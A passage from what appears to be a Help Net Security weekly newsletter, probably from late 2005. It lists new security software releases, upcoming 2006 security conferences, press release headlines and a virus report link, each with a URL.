MARADNS 1.1.91 (Linux)
MaraDNS is a DNS server that strives to be secure and fully
open-sourced.
http://www.net-security.org/software.php?id=84


SECURESERV 3.0 Alpha 3 (Linux)
SecureServ is an advanced IRC trojan detector, much like a virus
scanner, but aimed at IRC networks.
http://www.net-security.org/software.php?id=492


SHOREWALL 3.0.3 (Linux)
Shorewall is an iptables based firewall that can be used on a
dedicated firewall system, a multi-function masquerade gateway/server
or on a standalone Linux system.
http://www.net-security.org/software.php?id=40


STRONGSWAN 2.5.7 (Linux)
strongSwan is a complete IPsec and IKEv1 implementation for Linux 2.4
and 2.6 kernels.
http://www.net-security.org/software.php?id=643

----------------------------------------------------------------




[ Conferences ]


All conferences are located at:
http://net-security.org/conferences.php


----------------------------------------------------------------

Black Hat Federal 2006 Briefings and Training
Organized by Black Hat - 23 January-26 January 2006
http://www.net-security.org/conference.php?id=150


RSA Conference 2006
Organized by RSA Security - 13 February-17 February 2006
http://www.net-security.org/conference.php?id=142


Black Hat Europe 2006 Briefings and Training
Organized by Black Hat - 28 February-3 March 2006
http://www.net-security.org/conference.php?id=151


LayerOne 200
Organized by LayerOne - 22 April-23 April 2006
http://www.net-security.org/conference.php?id=154


iTrust 2006
Organized by IIT-CNR - 16 May-19 May 2006
http://www.net-security.org/conference.php?id=152


Eurocrypt 2006
Organized by IACR - 28 May-1 June 2006
http://www.net-security.org/conference.php?id=153

----------------------------------------------------------------




[ Security World ]


All press releases are located at:
http://www.net-security.org/press_main.php

Send your press releases to press@net-security.org


----------------------------------------------------------------

atsec information security Consultant Receives KPMG Information
Security Management Systems 2005 Award
http://www.net-security.org/press.php?id=3712


Cyberoam Unified Threat Management Appliance Eliminates Anonymity
from Internal Threats
http://www.net-security.org/press.php?id=3711


PlanetMagpie Partners With Sonasoft
http://www.net-security.org/press.php?id=3710


Utimaco's SafeGuard PDA adds advanced security for Palm OS users
http://www.net-security.org/press.php?id=3709


Be vigilant against Dasher warns Internet Security Systems
http://www.net-security.org/press.php?id=3708


Dasher-B Worm Exploits Microsoft Security Vulnerability On Windows
2000 PCs, Sophos Reports
http://www.net-security.org/press.php?id=3707


PC Magazine Awards 'Best Of The Year' To Astaro Security Gateway 220
http://www.net-security.org/press.php?id=3706


D-Link Unveils New Business Security Solutions
http://www.net-security.org/press.php?id=3705


Internet Security Systems Pre-emptively Protects Customers Against
Critical Flaw in Microsoft Internet Explorer
http://www.net-security.org/press.php?id=3704


Skybox Security Launches Industry’s First Integrated Suite For
Security Risk Management With Skybox View 2.5
http://www.net-security.org/press.php?id=3703


Safety Tips For Last-Minute Online Christmas Shoppers As Cybercrime
Runs Rampant
http://www.net-security.org/press.php?id=3702


Tips on How to Beat Online Fraudsters by Security Expert
http://www.net-security.org/press.php?id=3701


MDI, Inc. to Acquire Advanced Security Link
http://www.net-security.org/press.php?id=3700


Internet Security Systems Introduces Virus Prevention Technology in
Integrated Security Offering
http://www.net-security.org/press.php?id=3699


ISF Warns Of Spit And Other New Security Threats From VOIP
http://www.net-security.org/press.php?id=3698


Debenhams Selects PortWise Software Platform for Secure Application
Access for both Employees and Partners
http://www.net-security.org/press.php?id=3697


Apani Networks Debuts Industry’s Most Scalable Software for Securing
Inside the Network Perimeter; EpiForce 2.0 Launched at Interop-New
York
http://www.net-security.org/press.php?id=3696


Apani Networks Joins the Microsoft Network Access Protection Program
http://www.net-security.org/press.php?id=3695


Self Destruct Messages No Longer ‘Mission Impossible’ Thanks To
‘Stealthtext’
http://www.net-security.org/press.php?id=3694

----------------------------------------------------------------




[ Virus News ]


All virus news is located at:
http://www.net-security.org/viruses.php


----------------------------------------------------------------

Weekly Report on Viruses and Intruders - Mitglieder.GK,
WmaDownloader.B, Banbra.BOK and Bancos.LU Trojans
http://www.net-security.org/virus_news.php?id=599

----------------------------------------------------------------




Questions, contributions, comments or ideas go to:

Help Net Security staff
staff@net-security.org
http://net-security.org

----------------------

Unsubscribe from this weekly digest on:
http://www.net-security.org/subscribe.php

The archive of the newsletter in TXT and PDF format is available at:
http://www.net-security.org/newsletter_archive.php
